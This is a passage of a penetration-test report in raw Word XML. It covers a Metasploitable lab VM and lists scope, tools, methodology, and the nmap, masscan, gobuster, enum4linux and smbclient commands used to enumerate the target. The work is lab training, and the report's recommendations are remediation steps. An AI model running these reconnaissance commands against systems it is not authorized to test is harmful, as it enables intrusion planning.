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4194C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>CYART Vulnerability Assessment &amp; Penetration Test Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B65F0">
      <w:pPr>
        <w:pStyle w:val="14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Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerability Assessment &amp; Penetration Test — Metasploitable Lab</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Author:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Ishan Chowdhury</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 02/10/2025</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Contact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ishanchowdhury2018@gmail.com</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Target:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable VM — IP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>[192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>132.136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DC90A">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C8A280">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D277CD4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Scope &amp; Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BA394B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Tools &amp; Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D68842">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C1BAD">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Environment Setup </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94D500">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discovery &amp; Enumeration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A55BA3">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Scanning </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0973A944">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verification &amp; Exploitation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BE54C1">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation Plan </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B58FC3">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1100042B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>This engagement was a controlled vulnerability assessment and penetration test against a lab VM (Metasploitable). The assessment used only open-source tools and followed the NIST/OWASP-based VAPT methodology: Planning → Discovery → Vulnerability Scanning → Safe Verification → Reporting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B8552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Top findings (summary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12234B3B">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1201" w:leftChars="327" w:hanging="482" w:hangingChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Apache Tomcat manager reachable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — high risk: possible remote deploy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">ment </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Priority: HIGH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB125B1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Anonymous FTP write allowed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — medium/high risk: possible file upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">.    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Priority: MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9D5FA">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>SMB share with weak permissions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — medium: sensitive files accessible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="15"/>
        </w:rPr>
        <w:t>Priority: MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327F498">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>High-level recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF6E4D">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Patch/upgrade vulnerable services (Tomcat, vsftpd, Samba).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073286FD">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Disable unnecessary services and close unused ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDF2A7">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Hardening (remove default credentials/apps, enforce strong passwords, restrict service access via firewall).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5656F080">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Re-scan after remediation and schedule monthly automated scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7058C6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DDFA169">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Scope &amp; Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC2D40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Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Single internal lab VM (Metasploitable) at IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>[192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:rFonts w:hint="default" w:ascii="Courier New"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>132.136</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A064473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Authorization:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Test performed on owned lab targets only. No testing on external or production systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C8087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Allowed techniques:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Non-destructive discovery and vulnerability verification. Exploits used only with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or non-destructive modes. No data exfiltration or destructive payloads performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAA07EA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Tools used (open-source):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap, Masscan, Nikto, OWASP ZAP, sqlmap, dirsearch/gobuster, OpenVAS/GVM, Metasploit (checks only), Burp Suite Community, Gobuster, Hydra (lab only), enum4linux/smbclient/smbmap, Dradis CE, CherryTree.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D2FE8">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Tools &amp; Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78244140">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Attacker: Kali Linux (VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BCEC25">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Virtualization: VirtualBox (host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC122E4">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Tools: Nmap, Masscan, Gobuster, Nikto, OWASP ZAP, Burp Suite Community, OpenVAS/GVM, sqlmap, Metasploit Framework (msfconsole), enum4linux, smbclient, smbmap, Hydra, Dradis CE (optional), CherryTree (optional), Google Sheets/Excel for tracking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3021EC18">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BE4AC9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D024F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We followed a standard VAPT life cycle based on NIST/OWASP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB1810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Planning:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> scope confirmation, snapshot VM, create workspace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048BBB7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Discovery:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> network scanning (masscan, nmap), service enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906DC5C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Vulnerability scanning:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OpenVAS/GVM, Nikto, ZAP baseline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169716FD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Verification:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> safe verification via Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
        </w:rPr>
        <w:t>--dbs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> only, manual checks via Burp/ZAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C3F620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Risk scoring:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVSS v3.1 base scores computed using NVD CVSS calculator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C5B795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Reporting:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Findings recorded in spreadsheet and presented in this report. Evidence collected as screenshots and exported scan reports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498F9227">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Environment Setup — </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D26F8">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Update Kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4927F120">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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sudo apt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update</w:t>
      </w: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&amp;&amp;</w:t>
      </w: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sudo apt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</w:t>
      </w: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y upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F9725C">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Ensure required tools (most are preinstalled on Kali):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A3A64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# verify versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332CC00B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nmap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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9E072E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nikto -H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2419534D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msfconsole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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C350E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sqlmap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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D43F91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gobuster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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4595C177">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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zap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--version </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398F6CD">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Start OpenVAS (GVM) :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59044652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gvm-setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C4162C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gvm-start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2108054C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sudo gvm-check-setup    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7114A0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verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F959223">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/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# GVM web UI: https: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//127.0.0.1:9392</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59853367">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>arget IP (on Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>-3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3528EAA6">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0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30875" cy="4819650"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="2" name="Picture 2" descr="Screenshot 2025-10-01 133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0-01 1337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D5A7">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB47E29">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AD2682">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A87B7B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Discovery &amp; Enumeration — </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176F04D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. Fast port sweep (masscan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420B8519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apt install -y masscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A58336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masscan -p0-65535 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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--rate=1000 -oL masscan_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>full</w:t>
      </w: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.txt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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB08520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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5728335" cy="2573655"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
            <wp:docPr id="3" name="Picture 3" descr="Screenshot 2025-10-01 134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0-01 1345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59D9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. Full TCP discovery &amp; service version (nmap)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCBCF73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nmap -sS -sV -O -p- -T4 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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-oN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t xml:space="preserve"> </w:t>
      </w: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nmap_full.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32221336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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ABB9C4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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5724525" cy="2943225"/>
            <wp:effectExtent l="0" t="0" r="5715" b="13335"/>
            <wp:docPr id="4" name="Picture 4" descr="Screenshot 2025-10-01 124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0-01 1247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E577">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5098B6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. Web directory brute-force (gobuster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A55F93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apt install -y gobuster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2B0F6B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gobuster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dir</w:t>
      </w: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-u http://192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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-w /usr/share/wordlists/dirb/common.txt -t 50 -o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>dir_full</w:t>
      </w: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.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15269D1A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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F14919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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5730875" cy="1461135"/>
            <wp:effectExtent l="0" t="0" r="14605" b="1905"/>
            <wp:docPr id="5" name="Picture 5" descr="Screenshot 2025-10-01 133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0-01 1330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F1ED">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>4. SMB / Windows shares enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F12D59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enum4linux -a 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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&gt; enum4linux_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>full</w:t>
      </w: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.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B25A18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screenshot:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5727700" cy="3503295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="7" name="Picture 7" descr="Screenshot 2025-10-01 135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0-01 13550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8750">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="12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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5727700" cy="4064000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="8" name="Picture 8" descr="Screenshot 2025-10-01 135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0-01 1355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8912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smbclient -L //192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>132.136</w:t>
      </w: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-N &gt; smbclient_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12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t>full</w:t>
      </w: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.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B3F0A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screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FED2224">
      <w:pPr>
